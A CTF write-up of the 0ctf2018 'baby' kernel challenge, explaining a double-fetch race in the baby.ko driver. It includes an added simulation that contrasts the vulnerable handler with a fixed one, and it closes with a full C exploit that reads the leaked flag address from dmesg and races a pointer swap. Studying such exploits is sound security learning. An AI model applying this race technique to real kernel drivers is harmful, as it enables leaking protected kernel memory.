Kernel PWN learning (4) -- double fetch & 0ctf2018 baby
2022-04-23 09:28:00 【azraelxuemo】
Overall this challenge is not complicated: it is a simple race condition, a double fetch inside the driver.
Challenge
Attachment
Only the .tar.gz needs to be downloaded.
Attachment analysis
Don't be fooled by the name: it is just a tar archive.
The core.cpio inside is not compressed, so we only need to unpack it.
The exp, exp.c, core.cpio and fs.sh inside it can be deleted.
fs.sh is just a helper that regenerates the cpio.
Analysis of init
Here we can see that the driver is baby.ko and that it is reached by opening /dev/baby. Nothing else is notable, except that dmesg_restrict is not set, so we can run dmesg and read whatever printk writes.
Repack core.cpio
Analysis of start.sh
SMAP is not enabled, so kernel code can read user-space memory directly.
QEMU is not started with a single core and a single thread here, so a race condition can actually be triggered. To allow debugging we add -s.
Driver analysis
There are not many functions. The last three are irrelevant; the first three are what matters.
ioctl
I'm not sure what exactly is going on here; what I can recognise is that v2 is our third argument.
In other words, when we call ioctl(fd, a2, a3) the driver simply calls
sub_25(fd, a2, a3), so let's analyse sub_25.
sub_25
It calls two functions.
The first one leaks the kernel address of the flag. The format string here is %p, i.e. it prints the address at which the flag is stored; you can see that this is the address of aFlagThisWillbe.
That is where our final flag is kept.
The second function is
chk_range_not_ok
which is effectively
return upper_limit < (addr + size)
i.e. it reports whether the range [addr, addr + size) reaches past the upper limit. Let's see what that upper limit is.
Here we find out by debugging.
A very simple test program:
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>

int main(void){
    int fd = open("/dev/baby", O_RDWR);
    int a = 2;
    /* cmd 0x1337 with a user-space pointer: enough to break in the driver and watch the range check */
    ioctl(fd, 0x1337, &a);
    close(fd);
    return 0;
}
There is one question here that I hope someone more experienced can answer.
Normally we find the module's load address this way, but here that is clearly wrong.
I found the address this way instead.
The modified init: because the flag is hard-coded in the driver, I also deleted the test flag.
rax is assigned current_task.
rdx holds the value shown above, which looks familiar: it is the highest user-space address. So by debugging we find that *(_QWORD *)(__readgsqword((unsigned int)&current_task) + 4952)
is the upper bound of user-space addresses, i.e. the current task's user address limit.
Combining this with the body of the if, the conditions to satisfy it are:
command == 0x1337
upper_limit >= arg + 16
upper_limit >= *(long *)arg + *(int *)(arg + 8)
These two comparisons mean that what we pass in is actually the address of a structure:
struct flag_object{
long flag_addr;
long length;
}
So the first comparison checks that the structure we pass in lies in user space, and the second checks that our flag buffer (length bytes starting at flag_addr) lies in user space.
Because the driver only holds a pointer to our structure, and reads flag_addr from it once for the check and again for the comparison, we can race it: after the check has passed, we switch flag_addr in the structure to a kernel address.
The length must match as well: strlen does not count the trailing \0, so it is 33.
The driver then compares the buffer with the flag byte by byte. On any mismatch it stops; if everything matches it prints the flag with printk. Pointing flag_addr at the kernel's own copy of the flag makes the comparison succeed trivially, so the only thing we need is to switch the pointer through the race.
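To make the double fetch concrete, here is an added example written for this page; it is not the challenge's driver code and not the author's exploit. It models the 0x1337 handler in a small simulated address space: the names mem, USER_LIMIT, STRUCT_ADDR, USERBUF_ADDR, KFLAG_ADDR, vuln_ioctl, fixed_ioctl and the sample flag string are all constructed for the demonstration. vuln_ioctl fetches flag_addr twice, once for chk_range_not_ok and once for the comparison, which is exactly the window the exploit races; fixed_ioctl copies the structure once and checks and uses only that copy. The between_fetches hook stands in for the racing thread winning at the worst possible moment, so the result is deterministic.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed flat address space: [0, USER_LIMIT) plays the role of user
 * memory, [USER_LIMIT, MEM_SIZE) the role of kernel memory. USER_LIMIT is
 * the "upper limit" the driver reads from current_task + 4952. */
#define MEM_SIZE     0x2000
#define USER_LIMIT   0x1000
#define STRUCT_ADDR  0x0100   /* user-space struct flag_object */
#define USERBUF_ADDR 0x0200   /* user-space buffer the struct points at */
#define KFLAG_ADDR   0x1800   /* where the "kernel" keeps its flag */

static volatile unsigned char mem[MEM_SIZE];
static const char kflag[] = "flag{constructed_sample_flag_for_demo}";  /* constructed, not the real flag */

struct flag_object { uint64_t flag_addr; uint64_t length; };

/* Same predicate as the driver's chk_range_not_ok: true when the range
 * [addr, addr + size) would reach past the user-space limit. */
static int chk_range_not_ok(uint64_t addr, uint64_t size, uint64_t limit) {
    return limit < addr + size;
}

/* Every access goes through the volatile array so each fetch is a real
 * memory read; that is what makes the second fetch see the racer's write. */
static uint64_t rd64(uint64_t a) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | mem[a + i];
    return v;
}
static void wr64(uint64_t a, uint64_t v) {
    for (int i = 0; i < 8; i++) mem[a + i] = (unsigned char)(v >> (8 * i));
}

/* Vulnerable 0x1337 handler. Returns 1 when the driver would printk the
 * flag, 0 when it rejects. between_fetches() models the racing thread: it
 * runs after the check and before flag_addr is read again for the compare. */
int vuln_ioctl(uint64_t arg, void (*between_fetches)(void)) {
    if (chk_range_not_ok(arg, sizeof(struct flag_object), USER_LIMIT)) return 0;
    /* first fetch of flag_addr and length: only used for the check */
    if (chk_range_not_ok(rd64(arg), (int32_t)rd64(arg + 8), USER_LIMIT)) return 0;
    if (rd64(arg + 8) != strlen(kflag)) return 0;
    if (between_fetches) between_fetches();
    /* second fetch of flag_addr: the one that is actually dereferenced */
    uint64_t p = rd64(arg);
    for (size_t i = 0; i < strlen(kflag); i++)
        if (mem[p + i] != (unsigned char)kflag[i]) return 0;
    return 1;   /* printk("... %s", flag): the flag lands in dmesg */
}

/* Hardened handler: copy the structure once (the copy_from_user pattern),
 * then check and use that private copy. The user can still race the
 * structure in memory, but nothing reads it a second time. */
int fixed_ioctl(uint64_t arg, void (*between_fetches)(void)) {
    struct flag_object o;
    if (chk_range_not_ok(arg, sizeof o, USER_LIMIT)) return 0;
    o.flag_addr = rd64(arg);
    o.length    = rd64(arg + 8);
    if (chk_range_not_ok(o.flag_addr, o.length, USER_LIMIT)) return 0;
    if (o.length != strlen(kflag)) return 0;
    if (between_fetches) between_fetches();
    for (size_t i = 0; i < o.length; i++)
        if (mem[o.flag_addr + i] != (unsigned char)kflag[i]) return 0;
    return 1;
}

/* Lay out the exploit's scenario: struct in user space, flag_addr pointing
 * at a user buffer holding "fake", length equal to strlen(flag). */
void setup(void) {
    for (size_t i = 0; i < MEM_SIZE; i++) mem[i] = 0;
    for (size_t i = 0; i < strlen(kflag); i++) mem[KFLAG_ADDR + i] = (unsigned char)kflag[i];
    for (size_t i = 0; i < 4; i++) mem[USERBUF_ADDR + i] = (unsigned char)"fake"[i];
    wr64(STRUCT_ADDR, USERBUF_ADDR);
    wr64(STRUCT_ADDR + 8, strlen(kflag));
}

/* What the racing thread does: swap flag_addr to the kernel flag. */
static void racer_wins(void) { wr64(STRUCT_ADDR, KFLAG_ADDR); }

/* Scenario 1: honest call, no race. Both handlers reject ("fake" != flag). */
int demo_no_race(int use_fixed) {
    setup();
    return use_fixed ? fixed_ioctl(STRUCT_ADDR, NULL) : vuln_ioctl(STRUCT_ADDR, NULL);
}
/* Scenario 2: kernel pointer handed over up front. chk_range_not_ok stops both. */
int demo_kernel_ptr(int use_fixed) {
    setup();
    wr64(STRUCT_ADDR, KFLAG_ADDR);
    return use_fixed ? fixed_ioctl(STRUCT_ADDR, NULL) : vuln_ioctl(STRUCT_ADDR, NULL);
}
/* Scenario 3: the race lands between check and use. Only the vulnerable
 * handler ends up comparing the flag against itself and leaks it. */
int demo_race(int use_fixed) {
    setup();
    return use_fixed ? fixed_ioctl(STRUCT_ADDR, racer_wins) : vuln_ioctl(STRUCT_ADDR, racer_wins);
}

int main(void) {
    printf("no race:    vuln=%d fixed=%d\n", demo_no_race(0), demo_no_race(1));
    printf("kernel ptr: vuln=%d fixed=%d\n", demo_kernel_ptr(0), demo_kernel_ptr(1));
    printf("race wins:  vuln=%d fixed=%d\n", demo_race(0), demo_race(1));
    return 0;
}
```

The third scenario is the whole bug: the range check and the dereference look at two different values of flag_addr, and nothing ties them together. The real exploit below just replaces the racer_wins hook with a thread that rewrites the pointer as fast as it can and retries the ioctl until the write happens to land inside that window.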
Attack
Leaking the flag address
Because printk output only goes to the kernel log, after issuing the corresponding ioctl we need to look at dmesg; since dmesg_restrict=0 an ordinary user can read it. We then parse the address out of that line.
Constructing our flag structure
Writing the helper that switches flag_addr
finish is a flag: after the main function has sent enough requests we set it to 1 so the thread stops.
exp
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

long flag_addr;

/* cmd 0x6666 makes the driver printk the kernel address of the flag;
 * dmesg_restrict is 0, so we can read it back from the kernel log */
void get_kernel_flag_addr(int fd){
    ioctl(fd, 0x6666, 1);
    system("dmesg | tail > /tmp/1.txt");
    FILE *fp = fopen("/tmp/1.txt", "r");
    char buf[120];
    while (fgets(buf, sizeof(buf), fp)) {
        if (strstr(buf, "Your flag is at")) {
            char hex[17];
            /* offset 31 skips the dmesg timestamp prefix and "Your flag is at ";
             * the 16 hex digits of the address follow */
            strncpy(hex, buf + 31, 16);
            hex[16] = '\0';
            sscanf(hex, "%lx", &flag_addr);
            break;
        }
    }
    fclose(fp);
}

/* layout the driver expects behind the ioctl argument */
struct flag_structure {
    volatile long addr;   /* pointer to the buffer the driver compares against the flag */
    long len;             /* must equal strlen(flag) == 33 */
};

char fake_flag[] = "fake";
volatile int finish = 0;

/* racer thread: keep overwriting addr with the kernel flag address, hoping to
 * land between the driver's range check and its second fetch of the pointer */
void *chang_flag_addr(void *arg){
    struct flag_structure *s = arg;
    while (finish == 0) {
        s->addr = flag_addr;
    }
    return NULL;
}

int main(){
    int fd = open("/dev/baby", O_RDWR);
    get_kernel_flag_addr(fd);
    struct flag_structure flag;
    flag.addr = (long)fake_flag;
    flag.len = 33;
    pthread_t p1;
    /* first arg is the pthread object, second the attributes (NULL), third the
     * thread function, fourth its argument */
    pthread_create(&p1, NULL, chang_flag_addr, &flag);
    for (int i = 0; i < 10000; i++) {
        ioctl(fd, 0x1337, &flag);
        /* reset addr to user space, otherwise the range check never passes again */
        flag.addr = (long)fake_flag;
    }
    finish = 1;
    pthread_join(p1, NULL);
    system("dmesg | grep flag{");
    close(fd);
    return 0;
}
Copyright notice
This article was written by [azraelxuemo]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/04/202204230924486081.html